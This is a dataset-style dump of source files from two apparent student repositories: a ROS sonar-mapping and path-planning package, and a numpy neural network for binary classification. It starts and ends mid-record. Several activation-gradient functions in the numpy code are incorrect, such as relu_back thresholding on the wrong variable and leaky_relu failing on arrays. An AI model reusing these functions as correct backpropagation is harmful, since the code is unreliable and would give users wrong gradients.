path_to_target\n for identifier in identifier_path:\n node_pose = self.graph.node_attributes(identifier)\n path_to_target.append(node_pose[0][1]) \n except NodeUnreachable:\n # Create a new random point in map dimensions\n random_point_x = 
uniform(self.dimensions[0][0],self.dimensions[0][1])\n random_point_y = uniform(self.dimensions[1][0],self.dimensions[1][1])\n random_point = (random_point_x, random_point_y)\n # If new random point is free add it as node to the graph\n if self.point_free_cb(random_point):\n identifier = len(self.graph.nodes())\n self.graph.add_node(identifier, attrs=[('position', random_point)])\n # Check if new random point can be connected to any other point and add edges\n for node_identifier, attr in self.graph.node_attr.iteritems():\n position = attr[0][1]\n if random_point != position:\n if self.line_free_cb(random_point, position):\n self.graph.add_edge((identifier, node_identifier), wt = self.distance(random_point, position)) \n # Check if max tries are exceeded and stop\n count_tries += 1\n if count_tries >= self.max_tries:\n rospy.logwarn(\"Maximum tries exceeded, no Path could be found\")\n break\n \n return path_to_target\n\n def distance(self, point1, point2):\n '''\n Calculates the distance between two points.\n '''\n return sqrt(pow(point1[0] - point2[0], 2) + pow(point1[1] - point2[1], 2))\n\n def remove_edge(self, point1, point2):\n \"\"\"\n Remove the edge of the graph that connects the two given 2D points.\n\n The points are represented by tuples of two numbers (x, y).\n\n Has an effect only if both points have a corresponding node in the\n graph and if those nodes are connected by an edge.\n \"\"\"\n rospy.logwarn(\"Removing Edge {0} {1}\".format(point1,point2));\n node_id_1=None;\n node_id_2=None;\n for node_identifier, attr in self.graph.node_attr.iteritems():\n position = attr[0][1]\n if(point1 == position):\n node_id_1 = node_identifier;\n if(point2 == position):\n node_id_2 = node_identifier;\n if(node_id_1 != None and node_id_2 != None):\n break;\n \n if(self.graph.has_edge((node_id_1,node_id_2))):\n self.graph.del_edge((node_id_1,node_id_2));\n rospy.logwarn(\"Edge {0} {1} Removed\".format(point1,point2));\n pass\n"
},
{
"alpha_fraction": 0.6779552698135376,
"alphanum_fraction": 0.6891373991966248,
"avg_line_length": 26.456140518188477,
"blob_id": "5a4cbeb175007985c24410d76095b4da8f927b84",
"content_id": "b499790efafb35d173c432e6f829190ab8299c73",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 3130,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 114,
"path": "/amr_mapping/CMakeLists.txt",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "cmake_minimum_required(VERSION 2.8.3)\nproject(amr_mapping)\n\n# Load catkin and all dependencies required for this package\nfind_package(catkin REQUIRED \n COMPONENTS\n roscpp\n nav_msgs\n tf\n amr_msgs\n amr_srvs\n amr_stage\n)\n\ninclude_directories(include\n include\n ${Boost_INCLUDE_DIR}\n ${catkin_INCLUDE_DIRS}\n)\n\n# Set the build type. Options are:\n# Coverage : w/ debug symbols, w/o optimization, w/ code-coverage\n# Debug : w/ debug symbols, w/o optimization\n# Release : w/o debug symbols, w/ optimization\n# RelWithDebInfo : w/ debug symbols, w/ optimization\n# MinSizeRel : w/o debug symbols, w/ optimization, stripped binaries\nset(ROS_BUILD_TYPE RelWithDebInfo)\n\n# set the default path for built executables to the \"bin\" directory\nset(EXECUTABLE_OUTPUT_PATH ${PROJECT_SOURCE_DIR}/bin)\n# set the default path for built libraries to the \"lib\" directory\nset(LIBRARY_OUTPUT_PATH ${PROJECT_SOURCE_DIR}/lib)\n\n#...: compiler options :......................................................\n\n#...: gnu++0x\nif(CMAKE_COMPILER_IS_GNUCXX)\n execute_process(COMMAND ${CMAKE_C_COMPILER} -dumpversion OUTPUT_VARIABLE GCC_VERSION)\n if(GCC_VERSION VERSION_GREATER 4.6 OR GCC_VERSION VERSION_EQUAL 4.6)\n add_definitions(-std=gnu++0x)\n else(GCC_VERSION VERSION_GREATER 4.6 OR GCC_VERSION VERSION_EQUAL 4.6)\n message(SEND_ERROR \"You need GCC version 4.6 or greater to compile this package.\")\n endif(GCC_VERSION VERSION_GREATER 4.6 OR GCC_VERSION VERSION_EQUAL 4.6)\nendif(CMAKE_COMPILER_IS_GNUCXX)\n\n#...: treat warnings as errors and disable centain warnings\nadd_definitions(-Werror)\nadd_definitions(-Wno-error=unused-variable)\nadd_definitions(-Wno-error=unknown-pragmas)\nadd_definitions(-Wno-unknown-pragmas)\nadd_definitions(-Wno-deprecated)\n\n#...: determine OS type\nif((CMAKE_SIZEOF_VOID_P MATCHES 4) OR (CMAKE_CL_64 MATCHES 0))\n set(SUFFIX _x32)\nelseif((CMAKE_SIZEOF_VOID_P MATCHES 8) OR (CMAKE_CL_64 MATCHES 1))\n set(SUFFIX _x64)\nelse()\n message(SEND_ERROR \"Unable to determine whether the OS is 32 or 64 bit.\")\nendif()\n\n\n#...: target libraries :......................................................\n\nadd_library(mapstore${SUFFIX}\n src/map_store.cpp\n src/map_store_beam.cpp\n src/map_store_cone.cpp\n src/map_store_circle.cpp\n)\n\n#...: target executables :....................................................\n\n#...: sonar_mapper\nadd_executable(sonar_mapper\n nodes/sonar_mapper.cpp\n src/sonar_map.cpp\n)\ntarget_link_libraries(sonar_mapper\n mapstore${SUFFIX}\n)\n\nadd_dependencies(sonar_mapper \n ${catkin_EXPORTED_TARGETS}\n)\n\ntarget_link_libraries(sonar_mapper \n ${Boost_LIBRARIES}\n ${catkin_LIBRARIES}\n)\n\n#...: occupancy_query_server\nadd_executable(occupancy_query_server\n nodes/occupancy_query_server.cpp\n)\ntarget_link_libraries(occupancy_query_server\n mapstore${SUFFIX}\n)\n\nadd_dependencies(occupancy_query_server \n ${catkin_EXPORTED_TARGETS}\n)\n\ntarget_link_libraries(occupancy_query_server \n ${Boost_LIBRARIES}\n ${catkin_LIBRARIES}\n)\n\ncatkin_package(\n DEPENDS\n CATKIN_DEPENDS roscpp nav_msgs tf amr_msgs amr_srvs amr_stage\n INCLUDE_DIRS\n LIBRARIES\n)\n"
},
{
"alpha_fraction": 0.6293691396713257,
"alphanum_fraction": 0.6408780813217163,
"avg_line_length": 34.00746154785156,
"blob_id": "1db600765b520ca42ecb7a941a78838bb9278e77",
"content_id": "9c4202d0db0db43930e3d892a04ae81cf302387a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 4692,
"license_type": "no_license",
"max_line_length": 145,
"num_lines": 134,
"path": "/amr_mapping/src/sonar_map.cpp",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "#include <vector>\n\n#include <ros/console.h>\n\n#include \"sonar_map.h\"\n\nSonarMap::SonarMap(double resolution, double m_size_x, double m_size_y)\n: resolution_(resolution)\n, c_size_x_(lround(m_size_x / resolution) + 2)\n, c_size_y_(lround(m_size_y / resolution) + 2)\n, m_size_x_(resolution_ * c_size_x_)\n, m_size_y_(resolution_ * c_size_y_)\n, m_min_x_(-m_size_x_ / 2.0)\n, m_min_y_(-m_size_y_ / 2.0)\n, map_(c_size_x_, c_size_y_)\n, map_free_(c_size_x_, c_size_y_)\n, map_occupied_(c_size_x_, c_size_y_)\n, map_tmp_occupied_(c_size_x_, c_size_y_)\n{\n}\n\nvoid SonarMap::addScan(double sonar_x, double sonar_y, double sonar_theta, double fov, double max_range, double distance, double uncertainty)\n{\n // Variables initialization\n int cell_x=0, cell_y=0;\n double map_x=0, map_y=0;\n double distance_to_cell = 0;\n double theta_to_cell = 0;\n double erfree = 0, erocc = 0, ea = 0;\n double empty_old = 0, empty_new = 0;\n double occupied_old= 0, occupied_new = 0, occupied_sum = 0;\n\n // Calculates possibilities, the occupied sum and updates empty map\n mapstore::MapStoreCone cone = mapstore::MapStoreCone(sonar_x / resolution_, sonar_y / resolution_, sonar_theta, fov, max_range / resolution_);\n while (cone.nextCell(cell_x, cell_y))\n {\n if (convertToMap(cell_x, cell_y, map_x, map_y))\n {\n // Pre calculation for the possibilities\n distance_to_cell = computeEuclideanDistance(map_x, map_y, sonar_x, sonar_y);\n theta_to_cell = computeAngularDistance(atan2(map_y - sonar_y, map_x - sonar_x), sonar_theta);\n\n // Calculates the possibility per cell\n erfree = ErFree(distance, distance_to_cell, uncertainty);\n erocc = ErOcc(distance, distance_to_cell, uncertainty);\n ea = Ea(fov, theta_to_cell);\n\n // If distance equals max_range, the sensor is not detecting an obstacle and the occupied possibility should be 0\n if (distance >= max_range) { erocc = 0.0; }\n\n // Updates the empty map\n empty_new = erfree * ea;\n clamp(empty_new, 0.0, 1.0);\n empty_old = map_free_.get(cell_x, cell_y);\n empty_new = empty_old + empty_new - (empty_old * empty_new);\n map_free_.set(cell_x, cell_y, empty_new);\n\n // Creates occupied error sum\n occupied_new = erocc * ea;\n clamp(occupied_new, 0.0, 1.0);\n occupied_new = occupied_new * (1.0 - empty_new);\n occupied_sum = occupied_sum + occupied_new;\n\n // Stores occ_new in temporary occupied map\n map_tmp_occupied_.set(cell_x, cell_y, occupied_new);\n }\n }\n\n // Normalizes occupied possibilities and updates occupied and combined map\n mapstore::MapStoreCone cone2 = mapstore::MapStoreCone(sonar_x / resolution_, sonar_y / resolution_, sonar_theta, fov, max_range / resolution_);\n while (cone2.nextCell(cell_x, cell_y))\n {\n if (convertToMap(cell_x, cell_y, map_x, map_y))\n {\n occupied_new = map_tmp_occupied_.get(cell_x,cell_y);\n occupied_old = map_occupied_.get(cell_x,cell_y);\n\n // Checks if there was an obstacle in the measurement and if yes, the occupied map gets updated\n if (occupied_sum > 0)\n {\n // Normalization for occupied map\n occupied_new = occupied_new / occupied_sum;\n\n // Updates the occupied map\n occupied_new = occupied_old + occupied_new - (occupied_old * occupied_new);\n clamp(occupied_new, 0.0, 1.0);\n map_occupied_.set(cell_x, cell_y, occupied_new);\n }\n else { occupied_new = occupied_old; }\n\n // Updates the combined map\n empty_new = map_free_.get(cell_x, cell_y);\n if (occupied_new >= empty_new) { map_.set(cell_x, cell_y, occupied_new); }\n else { map_.set(cell_x, cell_y, -empty_new); }\n }\n }\n}\n\ndouble 
SonarMap::ErFree(double sensed_distance, double delta, double uncertainty) const\n{\n if (delta >= 0.0 && delta <= sensed_distance - uncertainty)\n {\n return 1 - pow((delta / (sensed_distance - uncertainty)), 2);\n }\n return 0.0;\n}\n\ndouble SonarMap::ErOcc(double sensed_distance, double delta, double uncertainty) const\n{\n if (delta >= sensed_distance - uncertainty && delta <= sensed_distance + uncertainty)\n {\n return 1 - pow(((delta - sensed_distance) / uncertainty), 2);\n }\n return 0.0;\n}\n\ndouble SonarMap::Ea(double sonar_fov, double theta) const\n{\n return 1 - pow(((2 * theta) / sonar_fov), 2);\n}\n\nbool SonarMap::convertToCell(const double m_x, const double m_y, int &c_x, int &c_y) const\n{\n c_x = lround(m_x / resolution_);\n c_y = lround(m_y / resolution_);\n return (map_.isInX(c_x) && map_.isInY(c_y));\n}\n\nbool SonarMap::convertToMap(const int c_x, const int c_y, double &m_x, double &m_y) const\n{\n m_x = c_x * resolution_;\n m_y = c_y * resolution_;\n return (map_.isInX(c_x) && map_.isInY(c_y));\n}\n\n"
},
{
"alpha_fraction": 0.6687763929367065,
"alphanum_fraction": 0.6727848052978516,
"avg_line_length": 37.84836196899414,
"blob_id": "172d598425645f50bf5c5aef5e5bc27d7f8fa9fe",
"content_id": "56261941d66fb30a7d7ba216feb8321cbeae8fdc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 9480,
"license_type": "no_license",
"max_line_length": 138,
"num_lines": 244,
"path": "/amr_mapping/include/sonar_map.h",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "#ifndef SONAR_MAP_H\n#define SONAR_MAP_H\n\n#include <memory>\n\n#include \"map_store.h\"\n#include \"map_store_cone.h\"\n\n/** This class implements the sonar map algorithm as described in \"Sonar-Based\n * Real-World Mapping and Navigation\" by Alberto Elfes, IEEE Journal Of\n * Robotics And Automation, Vol. RA-3, No. 3, June 1987.\n *\n * Map coordinates vs. map cells\n *\n * The map works internaly on a discrete, integer-based grid, but exposes a\n * more natural continuous coordinates interface. This allows an application\n * to work with the map using its own units (in this documentation refered to\n * as \"meters\"), without taking care of details of the map storage\n * implementation.\n *\n * Each cell with integer coordinates (c_x, c_y) occupies the space from\n * ((c_x - 0.5, c_y - 0.5) * resolution) exclusive to\n * ((c_x - 0.5, c_y + 0.5) * resolution) inclusive.\n *\n * The value resolution is the length of a cells edge. All cells are considered\n * to be squares.\n *\n * Note: if a variable name starts with the prefix \"m_\", then this variable\n * contains a map coordinate. If the name starts with \"c_\" then this variable\n * contains a cell coordinate. This convention applies both to the functions'\n * arguments and internal/local variables. */\nclass SonarMap\n{\n\npublic:\n\n typedef std::unique_ptr<SonarMap> UPtr;\n\n /** This constructor creates a map of given dimensions.\n *\n * @param resolution : size of a cell, measured in meters, i.e. the length of\n * the edge of a cell.\n *\n * @param m_size_x : initial size of the map in x direction (meters).\n *\n * @param m_size_y : initial size of the map in y direction (meters). */\n SonarMap(double resolution, double m_size_x, double m_size_y);\n\n /** Update map using a sonar reading.\n *\n * If the position of the sonar is outside of the current may, the map will\n * be grown.\n *\n * @param m_sonar_x : x coordinate of the sonar in map coordinates.\n *\n * @param m_sonar_y : y coordinate of the sonar in map coordinates.\n *\n * @param sonar_theta : orientation of the sonar in map coordinates.\n *\n * @param fov : opening angle of the sonar (radians).\n *\n * @param max_range : maximum possible range of the sonar (meters).\n *\n * @param distance : range reading returned from the sensor (meters).\n *\n * @param uncertainty : the noise associated with the sensed distance,\n * expressed as the standard deviation. */\n void addScan(double m_sonar_x, double m_sonar_y, double sonar_theta, double fov, double max_range, double distance, double uncertainty);\n\n double getResolution() const { return resolution_; }\n\n int getMinX() const { return m_min_x_; }\n\n int getMinY() const { return m_min_y_; }\n\n int getGridSizeX() const { return c_size_x_; }\n\n int getGridSizeY() const { return c_size_y_; }\n\n const double* getMapData() const { return map_.getRawData(); }\n\n const double* getMapFreeData() const { return map_free_.getRawData(); }\n\n const double* getMapOccupiedData() const { return map_occupied_.getRawData(); }\n\nprivate:\n\n /** Determine the map cell that contains the point given by a map coordinate.\n *\n * @param m_x : map coordinate to convert (meters).\n *\n * @param m_y : map coordinate to convert (meters).\n *\n * @param[out] c_x : the cell coordinate corresponding to @a m_x.\n *\n * @param[out] c_y : the cell coordinate corresponding to @a m_y.\n *\n * @return flag if the coordinate (@a m_x, @a m_y) is in the map (return\n * value is true) or not (return value is false). 
If the coordinate is\n * outside the map, then @a c_x and @a c_y are not valid cell coordinates for\n * this map. */\n bool convertToCell(const double m_x, const double m_y, int &c_x, int &c_y) const;\n\n /** Determine the map coordinates given map cell.\n *\n * @param c_x : cell coordinate to convert.\n *\n * @param c_x : cell coordinate to convert.\n *\n * @param m_x[out] : the map coordinate corresponding to @a c_x.\n *\n * @param m_y[out] : the map coordinate corresponding to @a c_y.\n *\n * @return flag if the cell with index (@a c_x, @a c_y) is in the map (return\n * value is true) or not (return value is false). If the cell is outside the\n * map, then @a m_x and @a m_y are not valid map coordinates for this map. */\n bool convertToMap(const int c_x, const int c_y, double &m_x, double &m_y) const;\n\n /** Expand map.\n *\n * This function expands the map around point @a x, @a y by @a size meters.\n * It adds a square of edge length @a size, no matter where @a x, @a y is\n * located. The map size and origin will be updated accordingly. The new\n * space is initialized as zero (unknown occupancy).\n *\n * @param m_x : x coordinate of point where the map should grow.\n *\n * @param m_y : y coordinate of point where the map should grow.\n *\n * @param size : length of the dge of the square which will be added to the\n * map.\n *\n * Note: it is fine to add space which is already in the map. Any overlap\n * between the area specified by @a x, @a y and @a size with the map will be\n * ignored. */\n void growMap(double m_x, double m_y, double size);\n\n /** Calculate free-space probability.\n *\n * This function calculates the probability to be free for a point that is\n * @a delta meters away from the sonar's origin when the sonar has measured a\n * distance of @a sensed_distance with @a uncertainty. This function only\n * computes the translational component of the probability. To fully specify\n * a point you need a distance and an angle and as such for the full\n * probability you need the angular probability of the point to be the cause\n * of the measured distance @a sensed_distance. This is calculated by Ea().\n * The full probability is the product of the result from Ea() and from this\n * function.\n *\n * @param sensed_distance : distance in meters measured by the sonar.\n *\n * @param delta : distance from the sonar's origin for which the probability\n * should be calculated.\n *\n * @param uncertainty : uncertainty (variance) of measured distance.\n *\n * @return The probability to be free for a point @a delta meters away from\n * the sonar's origin. The value is in the range 0 to 1. */\n double ErFree(double sensed_distance, double delta, double uncertainty) const;\n\n /** Calculate occupied-space probability.\n *\n * This function calculates the probability to be occupied for a point that\n * is @a delta meters away from the sonar's origin when the sonar has\n * measured a distance of @a sensed_distance with an uncertainty of\n * @a uncertainty. This function only computes the translational component of\n * the probability. To fully specify a point you need a distance and an angle\n * and as such for the full probability you need the angular probability of\n * the point to be the cause of the measured distance @a sensed_distance.\n * This is calculated by Ea(). 
The full probability is the product of the\n * result from Ea() and from this function.\n *\n * @param sensed_distance : distance in meters measured by the sonar.\n *\n * @param delta : distance from the sonar's origin for which the probability\n * should be calculated.\n *\n * @param uncertainty : uncertainty (variance) of measured distance.\n *\n * @return The probability to be occupied for a point @a delta meters away\n * from the sonar's origin. The value is in the range 0 to 1. */\n double ErOcc(double sensed_distance, double delta, double uncertainty) const;\n\n /** Probability for a point in the sonar cone to be actually measured.\n *\n * This function calculates the probability of a point @a theta radians away\n * from he center beam of a sonar cone of @a sonar_fov angular width, to be\n * the cause of a sonar measurement.\n *\n * @param sonar_fov : the opening angle of the sonar cone in radians.\n *\n * @param theta : the angular distance of a point from the center of the\n * sonar cone, measured in radians. This value must lie within plus/minus\n * @a sonar_fov / 2.\n *\n * @sa ErFree(), ErOcc() */\n double Ea(double sonar_fov, double theta) const;\n\n /** Helper function to clamp a variable to a given range. */\n template<typename T>\n static void clamp(T& value, T min, T max)\n {\n if (value < min)\n value = min;\n else if (value > max)\n value = max;\n }\n\n /** Helper function to compute the Euclidean distance between two points. */\n static double computeEuclideanDistance(double x1, double y1, double x2, double y2)\n {\n return sqrt((x1 - x2) * (x1 - x2) + (y1 - y2) * (y1 - y2));\n }\n\n /** Helper function to compute the angular distance between two angles (in\n * radians). */\n static double computeAngularDistance(double a1, double a2)\n {\n return atan2(sin(a1 - a2), cos(a1 - a2));\n }\n\n /// Size of a cell in meters\n double resolution_;\n /// Width of the map in cells\n int c_size_x_;\n /// Height of the map in cells\n int c_size_y_;\n /// Width of the map in meters\n double m_size_x_;\n /// Height of the map in meters\n double m_size_y_;\n /// X coordinate of bottom-left corner of the map in meters\n double m_min_x_;\n /// Y coordinate of bottom-left corner of the map in meters\n double m_min_y_;\n\n mapstore::MapStore map_;\n mapstore::MapStore map_free_;\n mapstore::MapStore map_occupied_;\n mapstore::MapStore map_tmp_occupied_;\n\n};\n\n#endif /* SONAR_MAP_H */\n\n"
}
] | 41 |
AngusNicolson/numpy_neural_net
|
https://github.com/AngusNicolson/numpy_neural_net
|
4f38b4da2dda2fab7cb0ebe5dbea24f17d62208b
|
90f2995c8d44568f5e3551e54cbbbcfcb8e66157
|
64357f9c00c9ea09fe45e464474b762352643359
|
refs/heads/master
| 2020-04-17T15:47:40.015375 | 2019-01-20T21:58:53 | 2019-01-20T21:58:53 | 166,713,487 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5436927676200867,
"alphanum_fraction": 0.5635477304458618,
"avg_line_length": 31.369047164916992,
"blob_id": "9aa4507f1c37a2ce95b177ce76a411a2df288143",
"content_id": "65f6d4524a78317a0382d850b1b680303de06157",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8411,
"license_type": "permissive",
"max_line_length": 164,
"num_lines": 252,
"path": "/numpy_neural_net.py",
"repo_name": "AngusNicolson/numpy_neural_net",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Jan 1 19:34:06 2019\r\n\r\n@author: angus\r\n\"\"\"\r\n\r\nimport numpy as np\r\nfrom sklearn.datasets import make_moons\r\nfrom sklearn.model_selection import train_test_split\r\n\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib import cm\r\n#from mpl_toolkits.mplot3d import Axes3D\r\nsns.set_style(\"whitegrid\")\r\n\r\ndef relu(Z):\r\n return np.maximum(0, Z)\r\n\r\ndef relu_back(dA, Z):\r\n dZ = np.array(dA, copy=True)\r\n dZ[dZ <= 0] = 0\r\n return dZ\r\n\r\ndef sigmoid(Z):\r\n return 1/(1+np.exp(-Z)) \r\n\r\ndef sigmoid_back(dA, Z):\r\n sig = sigmoid(Z)\r\n dZ = dA * sig*(1-sig)\r\n return dZ\r\n \r\ndef tanh(Z):\r\n return np.tanh(Z)\r\n\r\ndef tanh_back(dA, Z):\r\n return dA * (1- tanh(Z)**2)\r\n\r\ndef leaky_relu(Z, a=0.01):\r\n if Z < 0:\r\n return a*Z\r\n else:\r\n return Z\r\n\r\ndef leaky_relu_back(dA, Z, a=0.01):\r\n dZ = np.array(dA, copy=True)\r\n dZ[dZ <= 0] = dA * a\r\n return dZ\r\n\r\n\r\ndef init_params(nn_architecture, seed=1964):\r\n np.random.seed(seed)\r\n param_values = []\r\n scale = 1.0\r\n \r\n for layer in nn_architecture:\r\n W = np.random.rand(layer['output_dim'], layer['input_dim']) * scale - (0.5 * scale)\r\n b = np.random.rand(layer['output_dim'], 1) * scale - (0.5 * scale)\r\n \r\n param_values.append({'W': W, 'b': b})\r\n \r\n return param_values\r\n\r\ndef single_layer_forward(A_prev, W_curr, b_curr, activation):\r\n \r\n if activation == 'relu':\r\n activation_func = relu\r\n elif activation == 'tanh':\r\n activation_func = tanh\r\n elif activation == 'leaky_relu':\r\n activation_func = leaky_relu\r\n elif activation == 'sigmoid':\r\n activation_func = sigmoid\r\n else:\r\n raise Exception('Activation function not supported')\r\n \r\n \r\n U_curr = np.dot(W_curr, A_prev)\r\n Z_curr = U_curr + b_curr\r\n A_curr = activation_func(Z_curr)\r\n \r\n return Z_curr, A_curr\r\n\r\ndef forward_pass(X, param_values, nn_architecture):\r\n memory = [{'A': X, 'Z':None}]\r\n #Problem in this loop I think. 
Maybe with the single_layer_forward function\r\n for i, layer in enumerate(nn_architecture):\r\n Z, A = single_layer_forward(memory[i]['A'], param_values[i]['W'], param_values[i]['b'], nn_architecture[i]['activation'])\r\n memory.append({'A': A, 'Z': Z})\r\n \r\n i+=1\r\n \r\n return memory\r\n\r\ndef binary_cross_entropy(y_hat, y):\r\n return -(y*np.log(y_hat) + (1-y)*np.log(1-y_hat))\r\n\r\ndef get_cost_value(Y_hat, Y):\r\n m = Y_hat.shape[1]\r\n cost = -1 / m * (np.dot(Y, np.log(Y_hat).T) + np.dot(1 - Y, np.log(1 - Y_hat).T))\r\n return np.squeeze(cost)\r\n\r\ndef binary_cross_entropy_back(Y_hat, Y):\r\n return -np.divide(Y,Y_hat) + np.divide(1-Y, 1-Y_hat)\r\n\r\ndef get_accuracy(y_hat, y):\r\n y_hat = np.around(y_hat)\r\n \r\n return (y_hat==y).mean()\r\n\r\ndef single_layer_back(A_prev, Z_curr, W_curr, b_curr, dA_curr, activation):\r\n \r\n if activation == 'relu':\r\n back_activation_func = relu_back\r\n elif activation == 'tanh':\r\n back_activation_func = tanh_back\r\n elif activation == 'leaky_relu':\r\n back_activation_func = leaky_relu_back\r\n elif activation == 'sigmoid':\r\n back_activation_func = sigmoid_back\r\n else:\r\n raise Exception('Activation function not supported')\r\n \r\n m = len(dA_curr)\r\n dZ_curr = back_activation_func(dA_curr, Z_curr)\r\n db_curr = (1/m)*np.sum(dZ_curr, axis=1, keepdims=True)\r\n dA_prev = np.dot(W_curr.T, dZ_curr)\r\n dW_curr = (1/m)*np.dot(dZ_curr, A_prev.T)\r\n \r\n return dA_prev, db_curr, dW_curr\r\n\r\ndef back_pass(Y, memory, param_values, nn_architecture):\r\n grad_values = [dict() for x in range(len(nn_architecture))]\r\n Y_hat = memory[-1]['A']\r\n Y = Y.reshape(Y_hat.shape)\r\n \r\n dA_prev = binary_cross_entropy_back(Y_hat, Y)\r\n \r\n for i, layer in enumerate(nn_architecture):\r\n dA_curr = dA_prev\r\n layer_i = - i - 1\r\n dA_prev, db_curr, dW_curr = single_layer_back(memory[layer_i - 1]['A'],\r\n memory[layer_i]['Z'],\r\n param_values[layer_i]['W'],\r\n param_values[layer_i]['b'],\r\n dA_curr,\r\n nn_architecture[layer_i]['activation'])\r\n \r\n grad_values[layer_i].update({'db': db_curr, 'dW': dW_curr})\r\n \r\n return grad_values\r\n\r\ndef update_params(grad_values, param_values, nn_architecture, learning_rate):\r\n #print(param_values[0]['b'][0])\r\n for i, layer in enumerate(nn_architecture):\r\n param_values[i] = {'W': param_values[i]['W'] - grad_values[i]['dW'] * learning_rate,\r\n 'b': param_values[i]['b'] - grad_values[i]['db'] * learning_rate}\r\n #print(param_values[0]['b'][0])\r\n #print()\r\n return param_values\r\n\r\ndef train(X, Y, nn_architecture, epochs, learning_rate, seed=1964): \r\n history = {'accuracy':[],\r\n 'loss':[],\r\n 'params':[]}\r\n \r\n param_values = init_params(nn_architecture, seed)\r\n \r\n for epoch in range(epochs):\r\n \r\n memory = forward_pass(X, param_values, nn_architecture)\r\n Y_hat = memory[-1]['A']\r\n history['loss'].append(get_cost_value(Y_hat, Y))\r\n history['accuracy'].append(get_accuracy(Y_hat, Y))\r\n history['params'].append(param_values)\r\n grad_values = back_pass(Y, memory, param_values, nn_architecture)\r\n param_values = update_params(grad_values, param_values, nn_architecture, learning_rate)\r\n \r\n history['params'].append(param_values)\r\n \r\n return param_values, history\r\n\r\ndef make_plot(X, y, plot_name, file_name=None, XX=None, YY=None, preds=None, dark=False):\r\n if (dark):\r\n plt.style.use('dark_background')\r\n else:\r\n sns.set_style(\"whitegrid\")\r\n plt.figure(figsize=(16,12))\r\n axes = plt.gca()\r\n axes.set(xlabel=\"$X_1$\", 
ylabel=\"$X_2$\")\r\n plt.title(plot_name, fontsize=30)\r\n plt.subplots_adjust(left=0.20)\r\n plt.subplots_adjust(right=0.80)\r\n if(XX is not None and YY is not None and preds is not None):\r\n plt.contourf(XX, YY, preds.reshape(XX.shape), 25, alpha = 1, cmap=cm.Spectral)\r\n plt.contour(XX, YY, preds.reshape(XX.shape), levels=[.5], cmap=\"Greys\", vmin=0, vmax=.6)\r\n plt.scatter(X[:, 0], X[:, 1], c=y.ravel(), s=40, cmap=plt.cm.Spectral, edgecolors='black')\r\n if(file_name):\r\n plt.savefig(file_name)\r\n plt.close()\r\n\r\nnn_architecture = [\r\n {\"input_dim\": 2, \"output_dim\": 4, \"activation\": \"relu\"},\r\n {\"input_dim\": 4, \"output_dim\": 6, \"activation\": \"relu\"},\r\n {\"input_dim\": 6, \"output_dim\": 6, \"activation\": \"relu\"},\r\n {\"input_dim\": 6, \"output_dim\": 4, \"activation\": \"relu\"},\r\n {\"input_dim\": 4, \"output_dim\": 1, \"activation\": \"sigmoid\"},\r\n]\r\n\r\nnn_architecture = [\r\n {\"input_dim\": 2, \"output_dim\": 4, \"activation\": \"relu\"},\r\n {\"input_dim\": 4, \"output_dim\": 1, \"activation\": \"sigmoid\"},\r\n]\r\n\r\nnn_architecture = [\r\n {\"input_dim\": 2, \"output_dim\": 4, \"activation\": \"relu\"},\r\n {\"input_dim\": 4, \"output_dim\": 4, \"activation\": \"relu\"},\r\n {\"input_dim\": 4, \"output_dim\": 1, \"activation\": \"sigmoid\"},\r\n]\r\n\r\nnn_architecture = [\r\n {\"input_dim\": 2, \"output_dim\": 25, \"activation\": \"relu\"},\r\n {\"input_dim\": 25, \"output_dim\": 50, \"activation\": \"relu\"},\r\n {\"input_dim\": 50, \"output_dim\": 50, \"activation\": \"relu\"},\r\n {\"input_dim\": 50, \"output_dim\": 25, \"activation\": \"relu\"},\r\n {\"input_dim\": 25, \"output_dim\": 1, \"activation\": \"sigmoid\"},\r\n]\r\n\r\nN_SAMPLES = 1000\r\n# ratio between training and test sets\r\nTEST_SIZE = 0.1\r\n\r\nX, y = make_moons(n_samples = N_SAMPLES, noise=0.2, random_state=100)\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=TEST_SIZE, random_state=42)\r\n\r\n\r\nmake_plot(X, y, 'Data')\r\n#X, Y, nn_architecture, epochs, learning_rate, seed = np.transpose(X_train), np.transpose(y_train.reshape((y_train.shape[0], 1))), nn_architecture, 100, 0.001, 1964\r\n\r\nparams, history = train(np.transpose(X_train), np.transpose(y_train.reshape((y_train.shape[0], 1))), nn_architecture, 100, 0.0001, 1964)\r\n\r\nplt.figure()\r\nplt.plot(history['loss'])\r\nplt.title('loss')\r\nplt.yscale('log')\r\nplt.show()\r\n\r\nplt.figure()\r\nplt.plot(history['accuracy'])\r\nplt.title('accuracy')\r\nplt.show()\r\n\r\n"
},
{
"alpha_fraction": 0.7655502557754517,
"alphanum_fraction": 0.8086124658584595,
"avg_line_length": 68.66666412353516,
"blob_id": "ef70962243bf8230f6115e0e28f5f789e7b18d00",
"content_id": "8f4a21a181db3aaea498966ffd84f854ba49d716",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 209,
"license_type": "permissive",
"max_line_length": 103,
"num_lines": 3,
"path": "/README.md",
"repo_name": "AngusNicolson/numpy_neural_net",
"src_encoding": "UTF-8",
"text": "# numpy_neural_net\nNeural net for binary classification using numpy. Credit to Piotr Skalski's Medium post for help writing this.\nhttps://towardsdatascience.com/lets-code-a-neural-network-in-plain-numpy-ae7e74410795\n"
},
{
"alpha_fraction": 0.6214510798454285,
"alphanum_fraction": 0.6489409804344177,
"avg_line_length": 26.792207717895508,
"blob_id": "91a73e25cf6735ed89b8aa36245d4bbc6caa8ea0",
"content_id": "cef77ad198ef1ee56da9f10fc260ae04a9b3dc93",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2219,
